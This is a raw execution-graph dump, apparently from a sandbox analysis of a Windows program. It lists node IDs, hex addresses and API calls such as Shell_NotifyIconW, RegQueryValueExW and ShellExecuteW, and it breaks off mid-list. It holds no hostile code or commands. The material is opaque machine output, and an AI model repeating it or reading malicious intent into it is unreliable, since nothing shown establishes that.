                                                          execution_graph 84248 4010e0 84251 401100 84248->84251 84250 4010f8 84252 401113 84251->84252 84254 401120 84252->84254 84255 401184 84252->84255 84256 40114c 84252->84256 84282 401182 84252->84282 84253 40112c DefWindowProcW 84253->84250 84254->84253 84310 401000 Shell_NotifyIconW setSBUpLow 84254->84310 84289 401250 84255->84289 84258 401151 84256->84258 84259 40119d 84256->84259 84263 401219 84258->84263 84264 40115d 84258->84264 84261 4011a3 84259->84261 84262 42afb4 84259->84262 84260 401193 84260->84250 84261->84254 84273 4011b6 KillTimer 84261->84273 84274 4011db SetTimer RegisterWindowMessageW 84261->84274 84305 40f190 10 API calls 84262->84305 84263->84254 84265 401225 84263->84265 84268 401163 84264->84268 84269 42b01d 84264->84269 84321 468b0e 74 API calls setSBUpLow 84265->84321 84270 42afe9 84268->84270 84271 40116c 84268->84271 84269->84253 84309 4370f4 52 API calls 84269->84309 84307 40f190 10 API calls 84270->84307 84271->84254 84275 401174 84271->84275 84272 42b04f 84311 40e0c0 84272->84311 84304 401000 Shell_NotifyIconW setSBUpLow 84273->84304 84274->84260 84280 401204 CreatePopupMenu 84274->84280 84306 45fd57 65 API calls setSBUpLow 84275->84306 84280->84250 84282->84253 84283 42afe4 84283->84260 84284 42b00e 84308 401a50 331 API calls 84284->84308 84285 4011c9 PostQuitMessage 84285->84250 84288 42afdc 84288->84253 84288->84283 84290 401262 setSBUpLow 84289->84290 84291 4012e8 84289->84291 84322 401b80 84290->84322 84291->84260 84293 4012d1 KillTimer SetTimer 84293->84291 84294 40128c 84294->84293 84295 4012bb 84294->84295 84296 4272ec 84294->84296 84297 4012c5 84295->84297 84298 42733f 84295->84298 84299 4272f4 Shell_NotifyIconW 84296->84299 84300 42731a Shell_NotifyIconW 84296->84300 84297->84293 84301 427393 Shell_NotifyIconW 84297->84301 84302 427348 Shell_NotifyIconW 84298->84302 84303 42736e Shell_NotifyIconW 84298->84303 84299->84293 84300->84293 84301->84293 84302->84293 84303->84293 84304->84285 84305->84260 84306->84288 84307->84284 84308->84282 84309->84282 84310->84272 84313 40e0e7 setSBUpLow 84311->84313 84312 40e142 84315 40e184 84312->84315 84420 4341e6 63 API calls __wcsicoll 84312->84420 84313->84312 84314 42729f DestroyIcon 84313->84314 84314->84312 84317 40e1a0 Shell_NotifyIconW 84315->84317 84318 4272db Shell_NotifyIconW 84315->84318 84319 401b80 54 API calls 84317->84319 84320 40e1ba 84319->84320 84320->84282 84321->84283 84323 401b9c 84322->84323 84343 401c7e 84322->84343 84344 4013c0 84323->84344 84326 42722b LoadStringW 84329 427246 84326->84329 84327 401bb9 84349 402160 84327->84349 84363 40e0a0 84329->84363 84330 401bcd 84332 427258 84330->84332 84333 401bda 84330->84333 84367 40d200 52 API calls 2 library calls 84332->84367 84333->84329 84334 401be4 84333->84334 84362 40d200 52 API calls 2 library calls 84334->84362 84337 427267 84338 42727b 84337->84338 84340 401bf3 setSBUpLow _wcscpy _wcsncpy 84337->84340 84368 40d200 52 API calls 2 library calls 84338->84368 84342 401c62 Shell_NotifyIconW 84340->84342 84341 427289 84342->84343 84343->84294 84369 4115d7 84344->84369 84350 426daa 84349->84350 84351 40216b _wcslen 84349->84351 84407 40c600 84350->84407 84354 402180 84351->84354 84355 40219e 84351->84355 84353 426db5 84353->84330 84406 403bd0 52 API calls ctype 84354->84406 84356 4013a0 52 API calls 84355->84356 84359 4021a5 84356->84359 84358 402187 _memmove 84358->84330 84360 426db7 84359->84360 84361 4115d7 52 API calls 84359->84361 84361->84358 84362->84340 84364 40e0b2 84363->84364 84365 40e0a8 84363->84365 84364->84340 84419 403c30 52 API calls _memmove 84365->84419 84367->84337 84368->84341 84372 4115e1 _malloc 84369->84372 84371 4013e4 84380 4013a0 84371->84380 84372->84371 84375 4115fd std::exception::exception 84372->84375 84383 4135bb 84372->84383 84373 41163b 84398 4180af 46 API calls std::exception::operator= 84373->84398 84375->84373 84397 41130a 51 API calls __cinit 84375->84397 84376 411645 84399 418105 RaiseException 84376->84399 84379 411656 84381 4115d7 52 API calls 84380->84381 84382 4013a7 84381->84382 84382->84326 84382->84327 84384 413638 _malloc 84383->84384 84393 4135c9 _malloc 84383->84393 84405 417f77 46 API calls __getptd_noexit 84384->84405 84387 4135f7 RtlAllocateHeap 84387->84393 84396 413630 84387->84396 84389 413624 84403 417f77 46 API calls __getptd_noexit 84389->84403 84392 4135d4 84392->84393 84400 418901 46 API calls __NMSG_WRITE 84392->84400 84401 418752 46 API calls 6 library calls 84392->84401 84402 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84392->84402 84393->84387 84393->84389 84393->84392 84394 413622 84393->84394 84404 417f77 46 API calls __getptd_noexit 84394->84404 84396->84372 84397->84373 84398->84376 84399->84379 84400->84392 84401->84392 84403->84394 84404->84396 84405->84396 84406->84358 84408 40c619 84407->84408 84409 40c60a 84407->84409 84408->84353 84409->84408 84412 4026f0 84409->84412 84411 426d7a _memmove 84411->84353 84413 426873 84412->84413 84414 4026ff 84412->84414 84415 4013a0 52 API calls 84413->84415 84414->84411 84416 42687b 84415->84416 84417 4115d7 52 API calls 84416->84417 84418 42689e _memmove 84417->84418 84418->84411 84419->84364 84420->84315 84421 40bd20 84422 428194 84421->84422 84423 40bd2d 84421->84423 84425 40bd43 84422->84425 84427 4281bc 84422->84427 84429 4281b2 84422->84429 84424 40bd37 84423->84424 84444 4531b1 85 API calls 5 library calls 84423->84444 84433 40bd50 84424->84433 84443 45e987 86 API calls ctype 84427->84443 84442 40b510 VariantClear 84429->84442 84432 4281ba 84434 426cf1 84433->84434 84435 40bd63 84433->84435 84454 44cde9 52 API calls _memmove 84434->84454 84445 40bd80 84435->84445 84438 40bd73 84438->84425 84439 426cfc 84440 40e0a0 52 API calls 84439->84440 84441 426d02 84440->84441 84442->84432 84443->84423 84444->84424 84446 40bd8e 84445->84446 84447 40bdb7 _memmove 84445->84447 84446->84447 84448 40bded 84446->84448 84449 40bdad 84446->84449 84447->84438 84450 4115d7 52 API calls 84448->84450 84455 402f00 84449->84455 84452 40bdf6 84450->84452 84452->84447 84453 4115d7 52 API calls 84452->84453 84453->84447 84454->84439 84456 402f10 84455->84456 84457 402f0c 84455->84457 84458 4115d7 52 API calls 84456->84458 84459 4268c3 84456->84459 84457->84447 84460 402f51 ctype _memmove 84458->84460 84460->84447 84461 425ba2 84466 40e360 84461->84466 84463 425bb4 84482 41130a 51 API calls __cinit 84463->84482 84465 425bbe 84467 4115d7 52 API calls 84466->84467 84468 40e3ec GetModuleFileNameW 84467->84468 84483 413a0e 84468->84483 84470 40e421 _wcsncat 84486 413a9e 84470->84486 84473 4115d7 52 API calls 84474 40e45e _wcscpy 84473->84474 84489 40bc70 84474->84489 84478 40e4a9 84478->84463 84479 401c90 52 API calls 84481 40e4a1 _wcscat _wcslen _wcsncpy 84479->84481 84480 4115d7 52 API calls 84480->84481 84481->84478 84481->84479 84481->84480 84482->84465 84508 413801 84483->84508 84538 419efd 84486->84538 84490 4115d7 52 API calls 84489->84490 84491 40bc98 84490->84491 84492 4115d7 52 API calls 84491->84492 84493 40bca6 84492->84493 84494 40e4c0 84493->84494 84550 403350 84494->84550 84496 40e4cb RegOpenKeyExW 84497 427190 RegQueryValueExW 84496->84497 84498 40e4eb 84496->84498 84499 4271b0 84497->84499 84500 42721a RegCloseKey 84497->84500 84498->84481 84501 4115d7 52 API calls 84499->84501 84500->84481 84502 4271cb 84501->84502 84557 43652f 52 API calls 84502->84557 84504 4271d8 RegQueryValueExW 84505 42720e 84504->84505 84506 4271f7 84504->84506 84505->84500 84507 402160 52 API calls 84506->84507 84507->84505 84509 41381a 84508->84509 84510 41389e 84508->84510 84509->84510 84521 41388a 84509->84521 84530 419e30 46 API calls __write 84509->84530 84511 4139e8 84510->84511 84512 413a00 84510->84512 84535 417f77 46 API calls __getptd_noexit 84511->84535 84537 417f77 46 API calls __getptd_noexit 84512->84537 84515 4139ed 84536 417f25 10 API calls __write 84515->84536 84518 41396c 84518->84510 84519 413967 84518->84519 84522 41397a 84518->84522 84519->84470 84520 413929 84520->84510 84523 413945 84520->84523 84532 419e30 46 API calls __write 84520->84532 84521->84510 84529 413909 84521->84529 84531 419e30 46 API calls __write 84521->84531 84534 419e30 46 API calls __write 84522->84534 84523->84510 84523->84519 84525 41395b 84523->84525 84533 419e30 46 API calls __write 84525->84533 84529->84518 84529->84520 84530->84521 84531->84529 84532->84523 84533->84519 84534->84519 84535->84515 84536->84519 84537->84519 84539 419f13 84538->84539 84540 419f0e 84538->84540 84547 417f77 46 API calls __getptd_noexit 84539->84547 84540->84539 84543 419f2b 84540->84543 84542 419f18 84548 417f25 10 API calls __write 84542->84548 84546 40e454 84543->84546 84549 417f77 46 API calls __getptd_noexit 84543->84549 84546->84473 84547->84542 84548->84546 84549->84542 84551 403367 84550->84551 84552 403358 84550->84552 84553 4115d7 52 API calls 84551->84553 84552->84496 84554 403370 84553->84554 84555 4115d7 52 API calls 84554->84555 84556 40339e 84555->84556 84556->84496 84557->84504 84558 416454 84595 416c70 84558->84595 84560 416460 GetStartupInfoW 84561 416474 84560->84561 84596 419d5a HeapCreate 84561->84596 84563 4164cd 84564 4164d8 84563->84564 84680 41642b 46 API calls 3 library calls 84563->84680 84597 417c20 GetModuleHandleW 84564->84597 84567 4164de 84568 4164e9 __RTC_Initialize 84567->84568 84681 41642b 46 API calls 3 library calls 84567->84681 84616 41aaa1 GetStartupInfoW 84568->84616 84572 416503 GetCommandLineW 84629 41f584 GetEnvironmentStringsW 84572->84629 84576 416513 84635 41f4d6 GetModuleFileNameW 84576->84635 84578 41651d 84579 416528 84578->84579 84683 411924 46 API calls 3 library calls 84578->84683 84639 41f2a4 84579->84639 84582 41652e 84583 416539 84582->84583 84684 411924 46 API calls 3 library calls 84582->84684 84653 411703 84583->84653 84586 416541 84588 41654c __wwincmdln 84586->84588 84685 411924 46 API calls 3 library calls 84586->84685 84657 40d6b0 84588->84657 84591 41657c 84687 411906 46 API calls _doexit 84591->84687 84594 416581 __write 84595->84560 84596->84563 84598 417c34 84597->84598 84599 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84597->84599 84688 4178ff 49 API calls _free 84598->84688 84601 417c87 TlsAlloc 84599->84601 84604 417cd5 TlsSetValue 84601->84604 84605 417d96 84601->84605 84602 417c39 84602->84567 84604->84605 84606 417ce6 __init_pointers 84604->84606 84605->84567 84689 418151 InitializeCriticalSectionAndSpinCount 84606->84689 84608 417d91 84697 4178ff 49 API calls _free 84608->84697 84610 417d2a 84610->84608 84690 416b49 84610->84690 84613 417d76 84696 41793c 46 API calls 4 library calls 84613->84696 84615 417d7e GetCurrentThreadId 84615->84605 84617 416b49 __calloc_crt 46 API calls 84616->84617 84623 41aabf 84617->84623 84618 41ac6a GetStdHandle 84624 41ac34 84618->84624 84619 41acce SetHandleCount 84628 4164f7 84619->84628 84620 416b49 __calloc_crt 46 API calls 84620->84623 84621 41ac7c GetFileType 84621->84624 84622 41abb4 84622->84624 84625 41abe0 GetFileType 84622->84625 84626 41abeb InitializeCriticalSectionAndSpinCount 84622->84626 84623->84620 84623->84622 84623->84624 84623->84628 84624->84618 84624->84619 84624->84621 84627 41aca2 InitializeCriticalSectionAndSpinCount 84624->84627 84625->84622 84625->84626 84626->84622 84626->84628 84627->84624 84627->84628 84628->84572 84682 411924 46 API calls 3 library calls 84628->84682 84630 41f595 84629->84630 84631 41f599 84629->84631 84630->84576 84707 416b04 84631->84707 84633 41f5bb _memmove 84634 41f5c2 FreeEnvironmentStringsW 84633->84634 84634->84576 84636 41f50b _wparse_cmdline 84635->84636 84637 416b04 __malloc_crt 46 API calls 84636->84637 84638 41f54e _wparse_cmdline 84636->84638 84637->84638 84638->84578 84640 41f2bc _wcslen 84639->84640 84643 41f2b4 84639->84643 84641 416b49 __calloc_crt 46 API calls 84640->84641 84642 41f2e0 _wcslen 84641->84642 84642->84643 84644 41f336 84642->84644 84646 416b49 __calloc_crt 46 API calls 84642->84646 84647 41f35c 84642->84647 84650 41f373 84642->84650 84713 41ef12 46 API calls __write 84642->84713 84643->84582 84714 413748 84644->84714 84646->84642 84649 413748 _free 46 API calls 84647->84649 84649->84643 84720 417ed3 84650->84720 84652 41f37f 84652->84582 84654 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 84653->84654 84656 411750 __IsNonwritableInCurrentImage 84654->84656 84739 41130a 51 API calls __cinit 84654->84739 84656->84586 84658 42e2f3 84657->84658 84659 40d6cc 84657->84659 84740 408f40 84659->84740 84661 40d707 84744 40ebb0 84661->84744 84664 40d737 84747 411951 84664->84747 84669 40d751 84759 40f4e0 SystemParametersInfoW SystemParametersInfoW 84669->84759 84671 40d75f 84760 40d590 GetCurrentDirectoryW 84671->84760 84673 40d767 SystemParametersInfoW 84674 40d794 84673->84674 84675 40d78d FreeLibrary 84673->84675 84676 408f40 VariantClear 84674->84676 84675->84674 84677 40d79d 84676->84677 84678 408f40 VariantClear 84677->84678 84679 40d7a6 84678->84679 84679->84591 84686 4118da 46 API calls _doexit 84679->84686 84680->84564 84681->84568 84686->84591 84687->84594 84688->84602 84689->84610 84692 416b52 84690->84692 84693 416b8f 84692->84693 84694 416b70 Sleep 84692->84694 84698 41f677 84692->84698 84693->84608 84693->84613 84695 416b85 84694->84695 84695->84692 84695->84693 84696->84615 84697->84605 84699 41f683 84698->84699 84700 41f69e _malloc 84698->84700 84699->84700 84701 41f68f 84699->84701 84702 41f6b1 HeapAlloc 84700->84702 84705 41f6d8 84700->84705 84706 417f77 46 API calls __getptd_noexit 84701->84706 84702->84700 84702->84705 84704 41f694 84704->84692 84705->84692 84706->84704 84710 416b0d 84707->84710 84708 4135bb _malloc 45 API calls 84708->84710 84709 416b43 84709->84633 84710->84708 84710->84709 84711 416b24 Sleep 84710->84711 84712 416b39 84711->84712 84712->84709 84712->84710 84713->84642 84715 41377c __dosmaperr 84714->84715 84716 413753 RtlFreeHeap 84714->84716 84715->84643 84716->84715 84717 413768 84716->84717 84723 417f77 46 API calls __getptd_noexit 84717->84723 84719 41376e GetLastError 84719->84715 84724 417daa 84720->84724 84723->84719 84725 417dc9 setSBUpLow __call_reportfault 84724->84725 84726 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84725->84726 84729 417eb5 __call_reportfault 84726->84729 84728 417ed1 GetCurrentProcess TerminateProcess 84728->84652 84730 41a208 84729->84730 84731 41a210 84730->84731 84732 41a212 IsDebuggerPresent 84730->84732 84731->84728 84738 41fe19 84732->84738 84735 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84736 421ff8 GetCurrentProcess TerminateProcess 84735->84736 84737 421ff0 __call_reportfault 84735->84737 84736->84728 84737->84736 84738->84735 84739->84656 84743 408f48 ctype 84740->84743 84741 4265c7 VariantClear 84742 408f55 ctype 84741->84742 84742->84661 84743->84741 84743->84742 84800 40ebd0 84744->84800 84804 4182cb 84747->84804 84749 41195e 84811 4181f2 LeaveCriticalSection 84749->84811 84751 40d748 84752 4119b0 84751->84752 84753 4119d6 84752->84753 84754 4119bc 84752->84754 84753->84669 84754->84753 84846 417f77 46 API calls __getptd_noexit 84754->84846 84756 4119c6 84847 417f25 10 API calls __write 84756->84847 84758 4119d1 84758->84669 84759->84671 84848 401f20 84760->84848 84762 40d5b6 IsDebuggerPresent 84763 40d5c4 84762->84763 84764 42e1bb MessageBoxA 84762->84764 84765 42e1d4 84763->84765 84766 40d5e3 84763->84766 84764->84765 85020 403a50 52 API calls 3 library calls 84765->85020 84918 40f520 84766->84918 84770 40d5fd GetFullPathNameW 84930 401460 84770->84930 84772 40d63b 84773 40d643 84772->84773 84774 42e231 SetCurrentDirectoryW 84772->84774 84775 40d64c 84773->84775 85021 432fee 6 API calls 84773->85021 84774->84773 84945 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84775->84945 84778 42e252 84778->84775 84780 42e25a GetModuleFileNameW 84778->84780 84783 42e274 84780->84783 84784 42e2cb GetForegroundWindow ShellExecuteW 84780->84784 84782 40d656 84785 40d669 84782->84785 84788 40e0c0 74 API calls 84782->84788 85022 401b10 84783->85022 84786 40d688 84784->84786 84953 4091e0 84785->84953 84793 40d692 SetCurrentDirectoryW 84786->84793 84788->84785 84793->84673 84794 42e28d 85029 40d200 52 API calls 2 library calls 84794->85029 84797 42e299 GetForegroundWindow ShellExecuteW 84798 42e2c6 84797->84798 84798->84786 84799 40ec00 LoadLibraryA GetProcAddress 84799->84664 84801 40d72e 84800->84801 84802 40ebd6 LoadLibraryA 84800->84802 84801->84664 84801->84799 84802->84801 84803 40ebe7 GetProcAddress 84802->84803 84803->84801 84805 4182e0 84804->84805 84806 4182f3 EnterCriticalSection 84804->84806 84812 418209 84805->84812 84806->84749 84808 4182e6 84808->84806 84839 411924 46 API calls 3 library calls 84808->84839 84811->84751 84813 418215 __write 84812->84813 84814 418225 84813->84814 84815 41823d 84813->84815 84840 418901 46 API calls __NMSG_WRITE 84814->84840 84817 416b04 __malloc_crt 45 API calls 84815->84817 84824 41824b __write 84815->84824 84819 418256 84817->84819 84818 41822a 84841 418752 46 API calls 6 library calls 84818->84841 84822 41825d 84819->84822 84823 41826c 84819->84823 84821 418231 84842 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84821->84842 84843 417f77 46 API calls __getptd_noexit 84822->84843 84827 4182cb __lock 45 API calls 84823->84827 84824->84808 84829 418273 84827->84829 84830 4182a6 84829->84830 84831 41827b InitializeCriticalSectionAndSpinCount 84829->84831 84832 413748 _free 45 API calls 84830->84832 84833 418297 84831->84833 84834 41828b 84831->84834 84832->84833 84845 4182c2 LeaveCriticalSection _doexit 84833->84845 84835 413748 _free 45 API calls 84834->84835 84836 418291 84835->84836 84844 417f77 46 API calls __getptd_noexit 84836->84844 84840->84818 84841->84821 84843->84824 84844->84833 84845->84824 84846->84756 84847->84758 85030 40e6e0 84848->85030 84852 401f41 GetModuleFileNameW 85048 410100 84852->85048 84854 401f5c 85060 410960 84854->85060 84857 401b10 52 API calls 84858 401f81 84857->84858 85063 401980 84858->85063 84860 401f8e 84861 408f40 VariantClear 84860->84861 84862 401f9d 84861->84862 84863 401b10 52 API calls 84862->84863 84864 401fb4 84863->84864 84865 401980 53 API calls 84864->84865 84866 401fc3 84865->84866 84867 401b10 52 API calls 84866->84867 84868 401fd2 84867->84868 85071 40c2c0 84868->85071 84870 401fe1 84871 40bc70 52 API calls 84870->84871 84872 401ff3 84871->84872 85089 401a10 84872->85089 84874 401ffe 85096 4114ab 84874->85096 84877 428b05 84879 401a10 52 API calls 84877->84879 84878 402017 84880 4114ab __wcsicoll 58 API calls 84878->84880 84881 428b18 84879->84881 84882 402022 84880->84882 84884 401a10 52 API calls 84881->84884 84882->84881 84883 40202d 84882->84883 84885 4114ab __wcsicoll 58 API calls 84883->84885 84886 428b33 84884->84886 84887 402038 84885->84887 84889 428b3b GetModuleFileNameW 84886->84889 84888 402043 84887->84888 84887->84889 84890 4114ab __wcsicoll 58 API calls 84888->84890 84891 401a10 52 API calls 84889->84891 84893 40204e 84890->84893 84892 428b6c 84891->84892 84895 40e0a0 52 API calls 84892->84895 84894 402092 84893->84894 84898 401a10 52 API calls 84893->84898 84903 428b90 _wcscpy 84893->84903 84897 4020a3 84894->84897 84894->84903 84896 428b7a 84895->84896 84899 401a10 52 API calls 84896->84899 84900 428bc6 84897->84900 85104 40e830 53 API calls 84897->85104 84901 402073 _wcscpy 84898->84901 84902 428b88 84899->84902 84908 401a10 52 API calls 84901->84908 84902->84903 84905 401a10 52 API calls 84903->84905 84913 4020d0 84905->84913 84906 4020bb 85105 40cf00 53 API calls 84906->85105 84908->84894 84909 4020c6 84910 408f40 VariantClear 84909->84910 84910->84913 84911 402110 84915 408f40 VariantClear 84911->84915 84913->84911 84916 401a10 52 API calls 84913->84916 85106 40cf00 53 API calls 84913->85106 85107 40e6a0 53 API calls 84913->85107 84917 402120 ctype 84915->84917 84916->84913 84917->84762 84919 4295c9 setSBUpLow 84918->84919 84920 40f53c 84918->84920 84922 4295d9 GetOpenFileNameW 84919->84922 85783 410120 84920->85783 84922->84920 84924 40d5f5 84922->84924 84923 40f545 85787 4102b0 SHGetMalloc 84923->85787 84924->84770 84924->84772 84926 40f54c 85792 410190 GetFullPathNameW 84926->85792 84928 40f559 85803 40f570 84928->85803 85859 402400 84930->85859 84932 40146f 84935 428c29 _wcscat 84932->84935 85868 401500 84932->85868 84934 40147c 84934->84935 85876 40d440 84934->85876 84937 401489 84937->84935 84938 401491 GetFullPathNameW 84937->84938 84939 402160 52 API calls 84938->84939 84940 4014bb 84939->84940 84941 402160 52 API calls 84940->84941 84942 4014c8 84941->84942 84942->84935 84943 402160 52 API calls 84942->84943 84944 4014ee 84943->84944 84944->84772 84946 428361 84945->84946 84947 4103fc LoadImageW RegisterClassExW 84945->84947 85896 44395e EnumResourceNamesW LoadImageW 84946->85896 85895 410490 7 API calls 84947->85895 84950 40d651 84952 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 84950->84952 84951 428368 84952->84782 84954 409202 84953->84954 84955 42d7ad 84953->84955 85014 409216 ctype 84954->85014 86168 410940 331 API calls 84954->86168 86171 45e737 90 API calls 3 library calls 84955->86171 84958 409386 84959 40939c 84958->84959 86169 40f190 10 API calls 84958->86169 84959->84786 85019 401000 Shell_NotifyIconW setSBUpLow 84959->85019 84961 4095b2 84961->84959 84963 4095bf 84961->84963 84962 409253 PeekMessageW 84962->85014 86170 401a50 331 API calls 84963->86170 84965 40d410 VariantClear 84965->85014 84966 42d8cd Sleep 84966->85014 84967 4095c6 LockWindowUpdate DestroyWindow GetMessageW 84967->84959 84970 4095f9 84967->84970 84969 42e13b 86189 40d410 VariantClear 84969->86189 84973 42e158 TranslateMessage DispatchMessageW GetMessageW 84970->84973 84973->84973 84974 42e188 84973->84974 84974->84959 84976 409567 PeekMessageW 84976->85014 84978 44c29d 52 API calls 85011 4094e0 84978->85011 84979 46f3c1 107 API calls 84979->85014 84980 40e0a0 52 API calls 84980->85014 84981 46fdbf 108 API calls 84981->85011 84982 42dcd2 WaitForSingleObject 84987 42dcf0 GetExitCodeProcess CloseHandle 84982->84987 84982->85014 84983 409551 TranslateMessage DispatchMessageW 84983->84976 84985 42dd3d Sleep 84985->85011 84986 47d33e 309 API calls 84986->85014 86178 40d410 VariantClear 84987->86178 84990 4094cf Sleep 84990->85011 84991 40c620 timeGetTime 84991->85011 84994 42d94d timeGetTime 86174 465124 53 API calls 84994->86174 84998 465124 53 API calls 84998->85011 84999 42dd89 CloseHandle 84999->85011 85000 408f40 VariantClear 85000->85011 85002 42de19 GetExitCodeProcess CloseHandle 85002->85011 85005 42de88 Sleep 85005->85014 85008 45e737 90 API calls 85008->85014 85011->84978 85011->84981 85011->84991 85011->84998 85011->84999 85011->85000 85011->85002 85011->85005 85011->85014 85015 401b10 52 API calls 85011->85015 85017 401980 53 API calls 85011->85017 86175 45178a 54 API calls 85011->86175 86176 47d33e 331 API calls 85011->86176 86177 453bc6 54 API calls 85011->86177 86179 40d410 VariantClear 85011->86179 86180 443d19 67 API calls _wcslen 85011->86180 86181 4574b4 VariantClear 85011->86181 86182 403cd0 85011->86182 86186 4731e1 VariantClear 85011->86186 86187 4331a2 6 API calls 85011->86187 85012 42e0cc VariantClear 85012->85014 85013 408f40 VariantClear 85013->85014 85014->84958 85014->84962 85014->84965 85014->84966 85014->84969 85014->84976 85014->84979 85014->84980 85014->84982 85014->84983 85014->84985 85014->84986 85014->84990 85014->84994 85014->85008 85014->85011 85014->85012 85014->85013 85897 4091b0 85014->85897 85955 40afa0 85014->85955 85981 408fc0 85014->85981 86016 408cc0 85014->86016 86030 40d150 85014->86030 86035 40d170 85014->86035 86041 4096a0 85014->86041 86172 465124 53 API calls 85014->86172 86173 40c620 timeGetTime 85014->86173 86188 40e270 VariantClear ctype 85014->86188 85015->85011 85017->85011 85019->84786 85020->84772 85021->84778 85023 401b16 _wcslen 85022->85023 85024 4115d7 52 API calls 85023->85024 85025 401b63 85023->85025 85026 401b4b _memmove 85024->85026 85028 40d200 52 API calls 2 library calls 85025->85028 85027 4115d7 52 API calls 85026->85027 85027->85025 85028->84794 85029->84797 85031 40bc70 52 API calls 85030->85031 85032 401f31 85031->85032 85033 402560 85032->85033 85034 40256d __write_nolock 85033->85034 85035 402160 52 API calls 85034->85035 85037 402593 85035->85037 85047 4025bd 85037->85047 85108 401c90 85037->85108 85038 4026f0 52 API calls 85038->85047 85039 4026a7 85040 401b10 52 API calls 85039->85040 85046 4026db 85039->85046 85042 4026d1 85040->85042 85041 401b10 52 API calls 85041->85047 85112 40d7c0 52 API calls 2 library calls 85042->85112 85044 401c90 52 API calls 85044->85047 85046->84852 85047->85038 85047->85039 85047->85041 85047->85044 85111 40d7c0 52 API calls 2 library calls 85047->85111 85113 40f760 85048->85113 85051 410118 85051->84854 85053 42805d 85054 42806a 85053->85054 85169 431e58 85053->85169 85055 413748 _free 46 API calls 85054->85055 85057 428078 85055->85057 85058 431e58 82 API calls 85057->85058 85059 428084 85058->85059 85059->84854 85061 4115d7 52 API calls 85060->85061 85062 401f74 85061->85062 85062->84857 85064 4019a3 85063->85064 85070 401985 85063->85070 85065 4019b8 85064->85065 85064->85070 85772 403e10 53 API calls 85065->85772 85067 40199f 85067->84860 85069 4019c4 85069->84860 85070->85067 85771 403e10 53 API calls 85070->85771 85072 40c2c7 85071->85072 85073 40c30e 85071->85073 85076 40c2d3 85072->85076 85077 426c79 85072->85077 85074 40c315 85073->85074 85075 426c2b 85073->85075 85080 40c321 85074->85080 85081 426c5a 85074->85081 85078 426c4b 85075->85078 85079 426c2e 85075->85079 85773 403ea0 52 API calls __cinit 85076->85773 85778 4534e3 52 API calls 85077->85778 85776 4534e3 52 API calls 85078->85776 85087 40c2de 85079->85087 85775 4534e3 52 API calls 85079->85775 85774 403ea0 52 API calls __cinit 85080->85774 85777 4534e3 52 API calls 85081->85777 85087->84870 85090 401a30 85089->85090 85091 401a17 85089->85091 85092 402160 52 API calls 85090->85092 85093 401a2d 85091->85093 85779 403c30 52 API calls _memmove 85091->85779 85094 401a3d 85092->85094 85093->84874 85094->84874 85097 411523 85096->85097 85098 4114ba 85096->85098 85782 4113a8 58 API calls 3 library calls 85097->85782 85103 40200c 85098->85103 85780 417f77 46 API calls __getptd_noexit 85098->85780 85101 4114c6 85781 417f25 10 API calls __write 85101->85781 85103->84877 85103->84878 85104->84906 85105->84909 85106->84913 85107->84913 85109 4026f0 52 API calls 85108->85109 85110 401c97 85109->85110 85110->85037 85111->85047 85112->85046 85173 40f6f0 85113->85173 85115 40f77b _strcat ctype 85181 40f850 85115->85181 85120 427c2a 85210 414d04 85120->85210 85122 40f7fc 85122->85120 85123 40f804 85122->85123 85197 414a46 85123->85197 85128 40f80e 85128->85051 85132 4528bd 85128->85132 85129 427c59 85216 414fe2 85129->85216 85131 427c79 85133 4150d1 _fseek 81 API calls 85132->85133 85134 452930 85133->85134 85713 452719 85134->85713 85137 452948 85137->85053 85138 414d04 __fread_nolock 61 API calls 85139 452966 85138->85139 85140 414d04 __fread_nolock 61 API calls 85139->85140 85141 452976 85140->85141 85142 414d04 __fread_nolock 61 API calls 85141->85142 85143 45298f 85142->85143 85144 414d04 __fread_nolock 61 API calls 85143->85144 85145 4529aa 85144->85145 85146 4150d1 _fseek 81 API calls 85145->85146 85147 4529c4 85146->85147 85148 4135bb _malloc 46 API calls 85147->85148 85149 4529cf 85148->85149 85150 4135bb _malloc 46 API calls 85149->85150 85151 4529db 85150->85151 85152 414d04 __fread_nolock 61 API calls 85151->85152 85153 4529ec 85152->85153 85154 44afef GetSystemTimeAsFileTime 85153->85154 85155 452a00 85154->85155 85156 452a36 85155->85156 85157 452a13 85155->85157 85159 452aa5 85156->85159 85160 452a3c 85156->85160 85158 413748 _free 46 API calls 85157->85158 85161 452a1c 85158->85161 85163 413748 _free 46 API calls 85159->85163 85719 44b1a9 85160->85719 85164 413748 _free 46 API calls 85161->85164 85166 452aa3 85163->85166 85167 452a25 85164->85167 85165 452a9d 85168 413748 _free 46 API calls 85165->85168 85166->85053 85167->85053 85168->85166 85170 431e64 85169->85170 85171 431e6a 85169->85171 85172 414a46 __fcloseall 82 API calls 85170->85172 85171->85054 85172->85171 85174 425de2 85173->85174 85175 40f6fc _wcslen 85173->85175 85174->85115 85176 40f710 WideCharToMultiByte 85175->85176 85177 40f756 85176->85177 85178 40f728 85176->85178 85177->85115 85179 4115d7 52 API calls 85178->85179 85180 40f735 WideCharToMultiByte 85179->85180 85180->85115 85183 40f85d setSBUpLow _strlen 85181->85183 85184 40f7ab 85183->85184 85229 414db8 85183->85229 85185 4149c2 85184->85185 85241 414904 85185->85241 85187 40f7e9 85187->85120 85188 40f5c0 85187->85188 85189 40f5cd _strcat __write_nolock _memmove 85188->85189 85190 414d04 __fread_nolock 61 API calls 85189->85190 85192 425d11 85189->85192 85196 40f691 __tzset_nolock 85189->85196 85329 4150d1 85189->85329 85190->85189 85193 4150d1 _fseek 81 API calls 85192->85193 85194 425d33 85193->85194 85195 414d04 __fread_nolock 61 API calls 85194->85195 85195->85196 85196->85122 85198 414a52 __write 85197->85198 85199 414a64 85198->85199 85200 414a79 85198->85200 85469 417f77 46 API calls __getptd_noexit 85199->85469 85202 415471 __lock_file 47 API calls 85200->85202 85206 414a74 __write 85200->85206 85204 414a92 85202->85204 85203 414a69 85470 417f25 10 API calls __write 85203->85470 85453 4149d9 85204->85453 85206->85128 85538 414c76 85210->85538 85212 414d1c 85213 44afef 85212->85213 85706 442c5a 85213->85706 85215 44b00d 85215->85129 85217 414fee __write 85216->85217 85218 